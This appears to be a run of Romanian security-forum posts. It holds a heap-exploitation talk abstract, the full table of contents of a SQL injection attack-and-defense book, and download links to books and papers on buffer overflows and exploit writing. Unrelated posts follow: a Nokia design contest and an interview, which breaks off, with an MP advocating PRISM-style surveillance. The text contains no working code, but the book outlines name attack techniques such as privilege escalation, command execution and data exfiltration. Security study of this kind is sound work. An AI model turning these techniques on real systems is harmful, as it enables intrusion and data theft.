Nytro

Engleza e obligatorie in domeniu.

Sursa: AV Security Software Distribution - Distribuitor autorizat G Data Romania Adica: G-Data. E normal ca isi promoveaza produsul. La fel fac toate companiile. Daca veti verifica pe site-urile lor, ESET, Kaspersky, Avira, AVG, Bitdefender si toate celelalte, vor specifica ca la testele Virus Bulletin sau AV Test ei au avut cele mai bune rezultate. Info: http://eugene.kaspersky.com/2013/05/09/av-test-certification-devalued/ Ceva interesant: Eugene Kaspersky: Free AV Vendors Are Cheats

Syscan'11 Taipei - Modern Heap Exploitation Using The Low Fragmentation Heap Description: Exploit mitigation technologies have made reliable heap exploitation increasingly difficult since the inception of the 4-byte over write, over ten years ago. At the same time, applications needed to become more stable without using absurd amounts of memory (Who doesn't keep their web browser with multiple tabs open for days?). Heap memory management has matured over time, but with complex new code comes new opportunity for exploitation. This presentation will focus on understanding the Low Fragmentation heap on Windows 7 (32-bit). After a foundation of integral concepts is laid, new exploitation techniques will be thoroughly discussed. Finally, we will use this new found knowledge to leverage supposed non-exploitable vulnerabilities. For More Information please visit :- SyScan 2013 Sursa: Syscan'11 Taipei - Modern Heap Exploitation Using The Low Fragmentation Heap

Ce e cacatu asta?

SQLi Atack defense Contents Chapter 1 What Is SQL Injection?. 1 Introduction . 2 Understanding How Web Applications Work. 2 A Simple Application Architecture. 4 A More Complex Architecture. 5 Understanding SQL Injection. 6 High-Profile Examples. 10 Understanding How It Happens. 13 Dynamic String Building . 13 Incorrectly Handled Escape Characters. 14 Incorrectly Handled Types . 15 Incorrectly Handled Query Assembly. 17 Incorrectly Handled Errors. 18 Incorrectly Handled Multiple Submissions . 19 Insecure Database Configuration. 21 Summary. 24 Solutions Fast Track. 24 Frequently Asked Questions. 26 Chapter 2 Testing for SQL Injection. 29 Introduction . 30 Finding SQL Injection. 30 Testing by Inference. 31 Identifying Data Entry. 31 GET Requests . 31 POST Requests . 32 Other Injectable Data . 35 Manipulating Parameters . 36 Information Workf low. 39 Database Errors . 40 Commonly Displayed SQL Errors . 41 Microsoft SQL Server Errors. 41 MySQL Errors . 46 Oracle Errors . 49 ix x Contents Application Response. 51 Generic Errors. 51 HTTP Code Errors. 54 Different Response Sizes . 55 Blind Injection Detection. 56 Confirming SQL Injection. 60 Differentiating Numbers and Strings. 61 Inline SQL Injection . 62 Injecting Strings Inline. 62 Injecting Numeric Values Inline. 65 Terminating SQL Injection. 68 Database Comment Syntax. 69 Using Comments. 70 Executing Multiple Statements. 74 Time Delays. 79 Automating SQL Injection Discovery. 80 Tools for Automatically Finding SQL Injection . 81 HP WebInspect . 81 IBM Rational AppScan . 83 HP Scrawlr. 85 SQLiX . 87 Paros Proxy. 88 Summary. 91 Solutions Fast Track. 91 Frequently Asked Questions. 93 Chapter 3 Reviewing Code for SQL Injection . 95 Introduction . 96 Reviewing Source Code for SQL Injection. 96 Dangerous Coding Behaviors . 98 Dangerous Functions . 105 Following the Data. 109 Following Data in PHP. 110 Following Data in Java. 114 Following Data in C#. 115 Reviewing PL/SQL and T-SQL Code. 117 Automated Source Code Review. 124 Yet Another Source Code Analyzer (YASCA) . 125 Pixy. 126 AppCodeScan . 127 Contents xi LAPSE. 127 Security Compass Web Application Analysis Tool (SWAAT). 128 Microsoft Source Code Analyzer for SQL Injection. 128 Microsoft Code Analysis Tool .NET (CAT.NET). 129 Commercial Source Code Review Tools. 129 Ounce. 131 Source Code Analysis. 131 CodeSecure. 132 Summary. 133 Solutions Fast Track. 133 Frequently Asked Questions. 135 Chapter 4 Exploiting SQL Injection . 137 Introduction . 138 Understanding Common Exploit Techniques. 139 Using Stacked Queries. 141 Identifying the Database. 142 Non-Blind Fingerprint. 142 Banner Grabbing. 144 Blind Fingerprint. 146 Extracting Data through UNION Statements. 148 Matching Columns. 149 Matching Data Types . 151 Using Conditional Statements. 156 Approach 1: Time-based. 157 Approach 2: Error-based. 159 Approach 3: Content-based. 161 Working with Strings. 161 Extending the Attack . 163 Using Errors for SQL Injection. 164 Error Messages in Oracle . 167 Enumerating the Database Schema. 170 SQL Server . 171 MySQL. 177 Oracle. 180 Escalating Privileges. 183 SQL Server . 184 Privilege Escalation on Unpatched Servers . 189 Oracle. 190 xii Contents Stealing the Password Hashes . 192 SQL Server . 192 MySQL. 194 Oracle. 194 Oracle Components. 196 APEX. 196 Oracle Internet Directory . 197 Out-of-Band Communication . 198 E-mail. 199 Microsoft SQL Server . 199 Oracle. 202 HTTP/DNS. 203 File System. 203 SQL Server. 204 MySQL. 207 Oracle. 208 Automating SQL Injection Exploitation. 208 Sqlmap. 208 Sqlmap Example . 209 Bobcat. 211 BSQL . 212 Other Tools . 214 Summary. 215 Solutions Fast Track. 215 Frequently Asked Questions. 218 Chapter 5 Blind SQL Injection Exploitation. 219 Introduction . 220 Finding and Confirming Blind SQL Injection. 221 Forcing Generic Errors. 221 Injecting Queries with Side Effects. 222 Spitting and Balancing . 222 Common Blind SQL Injection Scenarios . 225 Blind SQL Injection Techniques. 225 Inference Techniques. 226 Increasing the Complexity of Inference Techniques. 230 Alternative Channel Techniques. 234 Using Time-Based Techniques. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 Delaying Database Queries. 235 MySQL Delays . 235 Contents xiii Generic MySQL Binary Search Inference Exploits . 237 Generic MySQL Bit-by-Bit Inference Exploits. 237 SQL Server Delays. 238 Generic SQL Server Binary Search Inference Exploits. 240 Generic SQL Server Bit-by-Bit Inference Exploits . 240 Oracle Delays . 240 Time-Based Inference Considerations. 241 Using Response-Based Techniques. 242 MySQL Response Techniques. 242 SQL Server Response Techniques. 244 Oracle Response Techniques. 246 Returning More Than One Bit of Information. 247 Using Alternative Channels. 249 Database Connections. 250 DNS Exfiltration . 251 E-mail Exfiltration. 255 HTTP Exfiltration. 256 Automating Blind SQL Injection Exploitation. 258 Absinthe . 258 BSQL Hacker . 260 SQLBrute . 263 Sqlninja. 264 Squeeza. 265 Summary. 267 Solutions Fast Track. 267 Frequently Asked Questions. 270 Chapter 6 Exploiting the Operating System. 271 Introduction . 272 Accessing the File System. 273 Reading Files. 273 MySQL. 274 Microsoft SQL Server . 280 Oracle. 289 Writing Files . 291 MySQL. 292 Microsoft SQL Server . 295 Oracle. 300 Executing Operating System Commands. 301 Direct Execution . 301 xiv Contents Oracle. 301 DBMS_SCHEDULER. 302 PL/SQL Native. 302 Other Possibilities. 303 Alter System Set Events. 303 PL/SQL Native 9i. 303 Buffer Overflows. 304 Custom Application Code. 304 MySQL. 304 Microsoft SQL Server . 305 Consolidating Access . 309 Summary. 312 Solutions Fast Track. 312 Frequently Asked Questions. 314 Endnotes. 315 Chapter 7 Advanced Topics . 317 Introduction . 318 Evading Input Filters . 318 Using Case Variation. 319 Using SQL Comments. 319 Using URL Encoding . 320 Using Dynamic Query Execution. 322 Using Null Bytes. 323 Nesting Stripped Expressions . 324 Exploiting Truncation. 324 Bypassing Custom Filters . 326 Using Non-Standard Entry Points. 327 Exploiting Second-Order SQL Injection. 329 Finding Second-Order Vulnerabilities. 332 Using Hybrid Attacks. 335 Leveraging Captured Data. 335 Creating Cross-Site Scripting . 335 Running Operating System Commands on Oracle . 336 Exploiting Authenticated Vulnerabilities. 337 Summary. 338 Solutions Fast Track. 338 Frequently Asked Questions. 340 Contents xv Chapter 8 Code-Level Defenses. 341 Introduction . 342 Using Parameterized Statements. 342 Parameterized Statements in Java. 344 Parameterized Statements in .NET (C#). 345 Parameterized Statements in PHP. 347 Parameterized Statements in PL/SQL. 348 Validating Input. 349 Whitelisting. 349 Blacklisting. 351 Validating Input in Java. 353 Validating Input in .NET. 354 Validating Input in PHP. 354 Encoding Output. 355 Encoding to the Database. 355 Encoding for Oracle . 356 Oracle dbms_assert. 357 Encoding for Microsoft SQL Server. 359 Encoding for MySQL. 360 Canonicalization . 362 Canonicalization Approaches. 363 Working with Unicode . 364 Designing to Avoid the Dangers of SQL Injection. 365 Using Stored Procedures. 366 Using Abstraction Layers. 367 Handling Sensitive Data. 368 Avoiding Obvious Object Names. 369 Setting Up Database Honeypots . 370 Additional Secure Development Resources. 371 Summary. 373 Solutions Fast Track. 373 Frequently Asked Questions. 375 Chapter 9 Platform-Level Defenses. 377 Introduction . 378 Using Runtime Protection. 378 Web Application Firewalls. 379 Using ModSecurity. 380 Configurable Rule Set. 380 Request Coverage. 383 xvi Contents Request Normalization. 383 Response Analysis. 384 Intrusion Detection Capabilities. 385 Intercepting Filters. 386 Web Server Filters. 386 Application Filters. 389 Implementing the Filter Pattern in Scripted Languages . 390 Filtering Web Service Messages. 391 Non-Editable versus Editable Input Protection. 391 URL/Page-Level Strategies. 392 Page Overriding . 392 URL Rewriting . 393 Resource Proxying/Wrapping . 393 Aspect-Oriented Programming (AOP) . 393 Application Intrusion Detection Systems (IDSs). 394 Database Firewall. 394 Securing the Database . 395 Locking Down the Application Data. 395 Use the Least-Privileged Database Login. 395 Revoke PUBLIC Permissions. 396 Use Stored Procedures. 396 Use Strong Cryptography to Protect Stored Sensitive Data . 397 Maintaining an Audit Trail. 398 Oracle Error Triggers. 398 Locking Down the Database Server. 400 Additional Lockdown of System Objects. . . . . . . . . . . . . . . . . . . . . . . . 400 Restrict Ad Hoc Querying. 401 Strengthen Controls Surrounding Authentication . 401 Run in the Context of the Least-Privileged Operating System Account . 401 Ensure That the Database Server Software Is Patched. 402 Additional Deployment Considerations. 403 Minimize Unnecessary Information Leakage. 403 Suppress Error Messages. 403 Use an Empty Default Web Site. 406 Use Dummy Host Names for Reverse DNS Lookups. 406 Use Wildcard SSL Certificates . 407 Limit Discovery via Search Engine Hacking. 407 Disable Web Services Description Language (WSDL) Information. 408 Contents xvii Increase the Verbosity of Web Server Logs . 409 Deploy the Web and Database Servers on Separate Hosts. 409 Configure Network Access Control. 409 Summary. 410 Solutions Fast Track. 410 Frequently Asked Questions. 412 Chapter 10 References. 415 Introduction . 416 Structured Query Language (SQL) Primer. 416 SQL Queries. 416 SELECT Statement. 417 UNION Operator. 417 INSERT Statement. 418 UPDATE Statement. 418 DELETE Statement. 418 DROP Statement . 420 CREATE TABLE Statement . 420 ALTER TABLE Statement. 420 GROUP BY Statement. 421 ORDER BY Clause. 421 Limiting the Result Set . 421 SQL Injection Quick Reference. 422 Identifying the Database Platform. 422 Identifying the Database Platform via Time Delay Inference . 423 Identifying the Database Platform via SQL Dialect Inference. 423 Combining Multiple Rows into a Single Row. 424 Microsoft SQL Server Cheat Sheet. 425 Enumerating Database Configuration Information and Schema. 425 Blind SQL Injection Functions: Microsoft SQL Server . 427 Microsoft SQL Server Privilege Escalation . 427 OPENROWSET Reauthentication Attack. 428 Attacking the Database Server: Microsoft SQL Server. 429 System Command Execution via xp_cmdshell . 429 xp_cmdshell Alternative. 430 Cracking Database Passwords. 430 Microsoft SQL Server 2005 Hashes . 431 File Read/Write. 431 xviii Contents MySQL Cheat Sheet . 431 Enumerating Database Configuration Information and Schema . 431 Blind SQL Injection Functions: MySQL. 432 Attacking the Database Server: MySQL . 433 System Command Execution. 433 Cracking Database Passwords. 434 Attacking the Database Directly. 434 File Read/Write. 434 Oracle Cheat Sheet . 435 Enumerating Database Configuration Information and Schema . 435 Blind SQL Injection Functions: Oracle. 436 Attacking the Database Server: Oracle. 437 Command Execution . 437 Reading Local Files. 437 Reading Local Files (PL/SQL Injection Only) . 438 Writing Local Files (PL/SQL Injection Only). 439 Cracking Database Passwords. 440 Bypassing Input Validation Filters . 440 Quote Filters. 440 HTTP Encoding . 442 Troubleshooting SQL Injection Attacks. 443 SQL Injection on Other Platforms. 446 PostgreSQL Cheat Sheet. 446 Enumerating Database Configuration Information and Schema . 447 Blind SQL Injection Functions: PostgreSQL. 448 Attacking the Database Server: PostgreSQL. 448 System Command Execution. 448 Local File Access. 449 Cracking Database Passwords. 449 DB2 Cheat Sheet. 449 Enumerating Database Configuration Information and Schema . 449 Blind SQL Injection Functions: DB2. 450 Informix Cheat Sheet. 451 Enumerating Database Configuration Information and Schema . 451 Blind SQL Injection Functions: Informix. 452 Contents xix Ingres Cheat Sheet. 452 Enumerating Database Configuration Information and Schema . 452 Blind SQL Injection Functions: Ingres . 453 Microsoft Access. 453 Resources . 453 SQL Injection White Papers. 453 SQL Injection Cheat Sheets. 454 SQL Injection Exploit Tools. 454 Password Cracking Tools. 455 Solutions Fast Track. 456 Index. 459 Download: http://rogunix.com/docs/WebSecurity/SQLi%20Atack%20defense.pdf

Rogunix: http://rogunix.com/docs/

Syngress Zero Day Exploit Countdown to Darkness The realistic portrayals of researching, developing, and ultimately defending the Internet from a malicious "Zero-Day" attack will appeal to every corner of the IT community. Although finctional, the numerous accounts of real events and references to real people will ring true with every member of the security community. This book will also satisfy those not on the "inside" of this community, who are fascinated by the real tactics and motives of criminal, malicous hackers and those who defent the Internet from them. Download: http://library.back2hack.cc/books/Other/Syngress_-_Zero_Day_Exploit_-_Countdown_to_Darkness_%5B%5D_%282004%29_en.pdf

Sockets, Shellcode, Porting, and Coding: Reverse Engineering Exploits and Tool Coding for Security Professionals James C Foster - aprilie 2005 Syngress - Editor Descriere The book is logically divided into 5 main categories with each category representing a major skill set required by most security professionals:1. Coding – The ability to program and script is quickly becoming a mainstream requirement for just about everyone in the security industry. This section covers the basics in coding complemented with a slue of programming tips and tricks in C/C++, Java, Perl and NASL. Download: http://www.multiupload.nl/50NRESVUMM Am cautat ceva pana sa o gasesc.

Buffer Overflow Attacks The buffer overflow is the whipping boy of software security. The main reason for omnipresent discussion and hype surrounding the buffer overflow is that the buffer overflow remains the principal method used to exploit software by remotely injecting malicious code into a target. Al- though the techniques of buffer overflow have been widely published else- where, this chapter remains a necessity. The buffer overflow has evolved over the years, as have a number of other attack techniques and, as a result, powerful new buffer overflow attacks have been developed. If nothing else, this chapter will serve as a foundation as you come to grips with the subtle nature of buffer overflows Download: http://library.back2hack.cc/books/Hacking/Syngress_-_Buffer_Overflow_Attacks_-_Detect_Exploit_and_Prevent_%5B%5D_%282000%29_en.pdf

Buffer-Overflow Vulnerabilities and Attacks 1 Memory In the PC architecture there are four basic read-write memory regions in a program: Stack, Data, BSS (Block Started by Symbol), and Heap. The data, BSS, and heap areas are collectively referred to as the ”data segment”. In the tutorial titled “Memory Layout And The Stack” [1], Peter Jay Salzman described memory layout in a great detail. Stack: Stack typically located in the higher parts of memory. It usually ”grows down”: from high address to low address. Stack is used whenever a function call is made. Data Segment – Data area: contains global variables used by the program that are not initialized to zero. For instance the string “hello world” defined by char s[] = "hello world" in C would exist in the data part. – BSS segment: starts at the end of the data segment and contains all global variables that are initialized to zero. For instance a variable declared static int i would be contained in the BSS segment. – Heap area: begins at the end of the BSS segment and grows to larger addresses from there. The Heap area is managed by malloc , realloc , and free . The Heap area is shared by all shared libraries and dynamic load modules in a process Download: http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Buffer_Overflow.pdf

Blended Attacks Exploits, Vulnerabilities and Buffer-Overflow Techniques in Computer Viruse By Eric Chien and Péter Ször Symantec Security Response Contents Abstract . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3 Definition of a Blended Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3 Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4 T ypes of Vulnerability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5 Buffer Overflows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5 Second Generation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7 Third Generation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11 URL Encoding and Canonicalization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .16 MIME Header Parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .17 Applications Rights Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19 System Modification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19 Network Enumeration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19 Current and Previous Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .20 Buffer Overflow Details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .23 Exception Frame Vulnerability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24 Buffer Overflow Usage in Computer Viruses . . . . . . . . . . . . . . . . . . . . . . . . . . .25 Current Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .29 Combating Blended Threats in the Future . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32 Appendix A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32 Appendix B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .35 About the Authors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .36 Download: http://www.symantec.com/avcenter/reference/blended.attacks.pdf

Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade rispin Cowan, Perry Wagle, Calton Pu,Steve Beattie, and Jonathan Walpole Department of Computer Science and Engineering Oregon Graduate Institute of Science & Technology (crispin@cse.ogi.edu) http://www.cse.ogi.edu/DISC/projects/immunix — 1 — Abstract Buffer overflows have been the most common form of security vulnerability for the last ten years. More over, buffer overflow vulnerabilities dominate the area of remote network penetra- tion vulnerabilities, where an anonymous Inter- net user seeks to gain partial or total control of a host. If buffer overflow vulnerabilities could be effectively eliminated, a very large portion of the most serious security threats would also be eliminated. In this paper, we survey the various types of buffer overflow vulnerabilities and attacks, and survey the various defensive mea- sures that mitigate buffer overflow vulnerabili- ties, including our own StackGuard method. We then consider which combinations of techniques can eliminate the problem of buffer overflow vulnerabilities, while preserving the functional- ity and performance of existing systems Download: http://css.csail.mit.edu/6.858/2011/readings/buffer-overflows.pdf

Moderatorii au si ei viata lor, nu stau sa vada toate posturile. In schimb, voi aveti buton de Report, pe care aparent nu stiti sa il folositi.

[h=1]Nokia Lumia Design Competition - concurs cu premii de 3000 de euro[/h]de Redactia Hit | 17 iulie 2013 Nokia ii provoaca pe cei mai inspirati dintre tinerii pasionati de design si ilustratie sa descopere noul smartphone Lumia 520, in cadrul unei competitii care le pune imaginatia in miscare: Nokia Lumia Design Competition. Pentru a demonstra ca este cel mai distractiv smartphone, spatele detasabil al telefonului va deveni un canvas pe care participantii il pot personaliza fara nicio restrictie. "Acestia trebuie sa-i ofere telefonului o nota personala, printr-o creatie unica si originala, care sa fie, in acelasi timp, un manifest personal creativ si amuzant. Nicio idee nu e prea indrazneata atat timp cat demonstreaza ca pana si o suprafata de dimensiuni mici, cum este cea a carcasei unui smartphone, poate fi transformata in cel mai cool suport de exprimare artistica", se arata in anuntul Nokia. Competitia se desfasoara pe platforma de creatie The Creator. Pe masura ce lucrarile vor fi inscrise, acestea vor putea fi votate de catre cele doua jurii. Intre 17 iulie si 16 septembrie, lucrarile vor fi evaluate de catre un juriu de profesionisti (format din reprezentanti Nokia, IQads si personalitati din domeniul designului, al publicitatii si al marketingului), dar si de catre publicul larg, prin intermediul paginii de competitie. La finalul competitiei, vor fi acordate 3 premii, in valoare totala de 3.000 de euro. Castigatorul premiului I va fi recompensat cu 1.500 de euro, cel de pe locul II va primi 1.000 de euro si cel de pe locul III – 500 de euro. De asemenea, castigatorii vor primi cate un smartphone Nokia Lumia 520, cu designul realizat de ei. Sursa: IQads Sursa: Nokia Lumia Design Competition - concurs cu premii de 3000 de euro | Hit.ro

Timesnewroman.ro - Cotidian independent de umor voluntar - Temu?ii hackeri români se plâng c? serverele NASA nu con?in nici manele, nici toren?i

// Removed http://www.zf.ro/business-hi-tech/naspers-a-cumparat-70-din-emag-sebastian-ghita-a-iesit-din-actionariat-9910486

Problemele la adresa moderatorilor mi le adresati prin PM.

[h=1]Interviu HotNews.ro: Sebastian Ghita, deputat PSD -Vom depune o initiativa legislativa care sa permita interceptarea cartelelor telefonice pre-platite. Serviciile secrete trebuie sa dispuna de instrumente de tipul PRISM pentru supravegherea internetului in cazul terorismului si al infractiunilor economice[/h] de Robert Mihailescu HotNews.ro Miercuri, 17 iulie 2013, 10:56 Actualitate | Esen?ial Deputatul PSD Sebastian Ghita vrea sa depuna o initiativa legislativa care sa permita posibilitatea interceptarii cartelelor telefonice pre-platite de catre serviciile secrete. Concret, atunci cand o persoana va cumpara o astfel de cartela, va trebuie sa prezinte codul numeric personal si, daca ulterior un judecator va decide interceptarea numarului telefonic asociat acestei cartele, serviciile secrete vor avea posibilitatea de a identifica detinatorul acestei cartele. Deputatul PSD, membru in Comisia comuna permanenta a Camerei Deputatilor si Senatului pentru exercitarea controlului parlamentar asupra activitatii SRI, dar si cel care controleaza postul de televiziune Romania TV, se pronunta pentru implementarea unui program PRISM in Romania, care sa permita supravegherea comunicatiilor pe internet, in cazul suspiciunilor de terorism sau infractiuni economice grave, argumentand in fata criticilor ca de multe ori se invoca protejarea viatii private "dar se doreste a se apara libertatea la infractiune". Sebastian Ghita isi argumenteaza demersul prin faptul ca aceasta zona, a cartelelor pre-platite, a ramas "neacoperita total" si este folosita pentru infractiuni economice. In plus, exista riscul de utilizare a acestor cartele in activitati legate de terorism. Iata mai jos declaratii facute de Sebastian Ghita, intr-un interviu acordat marti HotNews.ro, in care vorbeste despre cyber-securitate, interceptarea cartelelor pre-platite, posibilitatea ca serviciile secrete sa infiinteze firme sub acoperire, achizitii publice sau despre relatia personala cu premierul Victor Ponta. Sebastian Ghita: Exista o discutie si la nivelul Comisiei SRI, acum, si a parlamentarilor impreuna cu guvernul care vizeaza modul in care aceasta zona, ramasa neacoperita total, suntem in imposibilitatea de a avea un mod gestionat prin lege in care sa ne raportam la cartelele pre-platite, repet, exista aceasta preocupare, sa gasim o solutie. Vrem sa gasim o solutie cu privire la modul de gestionare a cartelelor pre-platite. Nu ma refer neaparat la cartelele pre-platite care au fost cumparate pana acum, care isi pierd din valabilitate, nu mai sunt folosite si incet-incet ies din uz, dar trebuie sa generam un cadru legal prin care, in conditiile in care aceste cartele pre-platite din Romania pot fi folosite la infractiuni, ele sa poata fi luate in evidenta si sa aiba acelasi regim ca telefoanele obisnuite. De ce? Am vazut toti ce s-a intamplat la Iasi, multe din cazurile ca cel din Bulgaria, de infractiuni, si ma refer si la terorism, la infractiuni economice, au, din pacate, cartelele pre-platite ca instrument de a te ascunde de autoritati. Sunt cartele pre-platite care permit traficul de date, sunt cartele pre-platite care nu permit identificarea utilizatorului. Concret, omul cand isi cumpara o cartela (...) va trebui sa prezinte dovada cu CNP, nume, prenume si adresa. Aceste date vor fi centralizate de o autoritate si, in cazul unei cereri de ascultare, operatorul trebuie sa fie capabil sa puna la dispozitie CNP-ul, numele si prenumele persoanei care a folosit o anumita cartela. Nu este o initiativa personala, fie vom gasi o forma prin care sa convingem guvernul sa vina cu o astfel de initiativa, fie o sa depunem mai multi (parlamentari) in Parlament, ma chinui sa conving niste colegi acum si am si avut niste discutii cu cativa, in toamna vom incepe demersurile pentru chestiunea aceasta. Reporter: A existat o cerere de afara Romaniei pentru acest demers? S.G. De foarte multe ori folosim chestiunea aceasta cu cereri din afara ca sa facem noi ceva. Realitatea e ca eu nu vreau sa imi vad copiii rapiti pe strada si nici nu vreau sa imi vad sarind vreo bomba intr-un hotel si nici nu cred ca in numele libertatilor cetatenesti trebuie sa ne permitem luxul de a fi nesiguri, de a ne lasa expusi. E o mare gaura in chestiunea asta pentru siguranta noastra a tuturor. Nu cred ca mai trebuie sa vina de afara cineva sa ne spuna ce avem de facut. Am avut intalniri cu comisiile altor state care se ocupa de legiferare si i-am intrebat, am citit rapoarte, modul in care se legifereaza in alte tari. Tehnologia avanseaza foarte tare si pana la urma la asta ne-am angajat in societate, nu ne-am facut deputati ca sa vrem insigne si sa ne plimbam pe acolo, prin Parlament, prin cladirea lui Nea Nicu. Am discutat aceasta initiativa si in PSD, exista o reticenta, o frica de a te expune public ca politician cu o astfel de initiativa, dar sa fii politician nu inseamna sa fugi de raspundere ca sa nu ti se poata reprosa nimic, la sfarsit trebuie sa le spui oamenilor, am facut asta, mi-am asumat asta, in asta cred, si eu cred ca prin experienta capatata in industria IT, in apropiere de lumea informaticii, lumea comunicatiilor, cyberworld sau societatea informationala pot sa imi asum rolul de a fi membru al unei echipe care impinge astfel de lucruri. Legislatia noastra e veche, tehnologia a avansat foarte mult, eu am 34 de ani si in curand doi copii, acum am doar unul. Ma gandesc cu groaza ca se poate intampla ceva rau. Nu stiu cum vom reactiona toti. Daca acum nu facem ce trebuie, atunci ne vom da toti pumni. Noi, ca politicieni, in loc sa iesim public si sa explicam ca de fapt nu vrem sa va inregistram, sa va ascultam de nebuni, degeaba, oricand, ci doar in cazul in care se constata ca in anumite infractiuni gen terorism, zonele evaziunii fiscale groaznice, a crimei organizate, se folosesc astfel de metode de a te ascunde de autoritati, atunci operatorul sa poata sa spune la mine Popescu a cumparat cartela. In ceea ce priveste politica pe cyber-securitate, lucrurile vor capata amploare si va deveni mai importanta discutia despre ce informatii luam din spatiul oarecum public, respectiv Facebook, Google, alte date luate de pe alte site-uri, social media, despre cetatenii din Romania si cei din afara care vizeaza Romania, decat despre ce se intampla cu cartelele sau cu telefoanele sau cu ascultarile. Sa stiti ca astazi informatia aflata pe net este de multe ori mult mai valoroasa decat o convorbire telefonica. Cercul relational, prieteniile, tipul de mesaje, poti mult mai repede sa-ti dai seama de pornirile idioate, de terorism, de atentator, de om nebun ale unui individ de pe Facebook sau din felul in care se exprima pe bloguri, cum pune comentarii la articole din ziare, decat dintr-o convorbire pe care o are cu prietena. Si atunci, cred ca s-au facut eforturi si Romania va trebui sa faca eforturi uriase acum, sa faca rapid pasul spre update-ul tehnologic pentru a putea foarte repede sa prinda astfel de informatii si sa le si utilizeze. O informatie, degeaba o prinzi, daca nu o poti si utiliza. Reporter: Inteleg ca ati putea avea in vedere un program PRISM pentru Romania? S.G.: Da, cred foarte tare ca serviciile romanesti ar trebui, fie in relatie cu ceilalti parteneri de afara, fie ele direct, sa isi construiasca astfel de instrumente. Daca nu si-au si construit. Oricum, un mandat de la un judecator, pentru ca fara un mandat de la un judecator nu se poate vorbi de nimic, contine astazi posibilitatea ca un cetatean sa aiba interceptate toate mijloacele de comunicatie electronice, aici referindu-ne si la ceea ce a facut in trecut, pe retele de socializare, pe internet, si credeti-ma log-urile, history-urile, iti arata totul, ce face acum si ce face pe perioada mandatului. De urgenta trebuie sa se gandeasca si trebuie sa le alocam resurse financiare astfel incat (serviciile secrete n.r.) sa fie capabile sa culeaga aceste informatii. Degeaba ne vom certa cu ei la televizor si ii vom acuza daca azi nu le dam resurse si nu-i ajutam, pana la urma e tara noastra, e viata noastra, daca nu ne hotaram sa plecam de aici si sa stam in Germania si sa credem ca ne apara serviciile de acolo si ca societatea de acolo e mai organizata, atunci trebui sa o organizam pe cea de aici. Repede. Oamenii mai in varsta, conducatorii mai in varsta, politicienii mai in varsta uneori nu inteleg deloc despre ce e vorba si alteori inteleg asa in mare, inteleg ca e ceva complicat... Reporter: In afara au aparut reactii foarte critice la astfel de initiative. S.G. De la pseudogrijulii fata de societate. In cine sa am mai multa incredere? Intr-unul de la servicii, care, vezi Doamne, ar abuza de informatia asta, sau intr-un nebun care vrea sa arunce cu o bomba pe care a gasit-o el pe la el prin sat un campus universitar in aer? Va zic eu de acum, o sa avem mai multa incredere in cei de la servicii, asta e realitatea pe tot globul si trebuie sa ne obisnuim cu ea. Reporter:Se va redeschide dezbaterea legata de statul politienesc care se construieste in Romania, acuzat de membrii unor partide? S.G. Nu am observat o preocupare mai mare intr-un partid sau altul, in toate partidele sunt acest preocupari si vizeaza in general componenta care, vezi Doamne serviciile, intra in zona de coruptie sau in zona de infractionalitate economica. Trebuie sa se obisnuiasca si cei din partide ca organizatiile lor nu sunt o adunatura a escrocilor si a coruptilor de pretutindeni ci trebuie sa-si puna munca in slujba societatii.. Reporter: Si in ceea ce priveste acuzatiile de intruziune in viata privata? S.G.: Discursul se suprapune si e pervers de multe ori. Se foloseste viata intima dar se doreste a se apara libertatea la infractiune. Viata intima, da, trebuie protejata, capacitatea de a face rau societatii nu trebuie protejata si nu cred ca se va gasi un politician sa faca rele contra libertatilor omului dar nici nu cred ca mai trebuie sa stam cu mainile in san sa toleram atatea rele in numele libertatii si drepturilor omului. Maine veti vedea ca retelele de prostitutie se muta din discoteca din Mizil pe Facebook, de fapt s-au mutat deja, stiti bine. Romancele de 15 ani o sa fie racolate de pe Facebook si proxenetii nu vor mai sta in Romania, vor sta in Palma de Mallorca, si trebuie sa fim in stare sa blocam lucrul asta, altfel o sa fim carne de tun. In Romania, astazi, cel mai mare bun pe care il avem e siguranta noastra. Nooua nu ni se rapesc copiii, nu ni se impusca politicieni sau oameni de afaceri ca in Bulgaria, nu te santajeaza la colt de strada cine stie ce gainari, nu se intampla nimic din toate astea. Reporter: Sunteti membru Comisia comuna permanenta a Camerei Deputatilor si Senatului pentru exercitarea controlului parlamentar asupra activitatii SRI. Legile securitatii nationale vor fi aprobate inainte sau dupa modificarea Constitutiei? S.G. Au existat 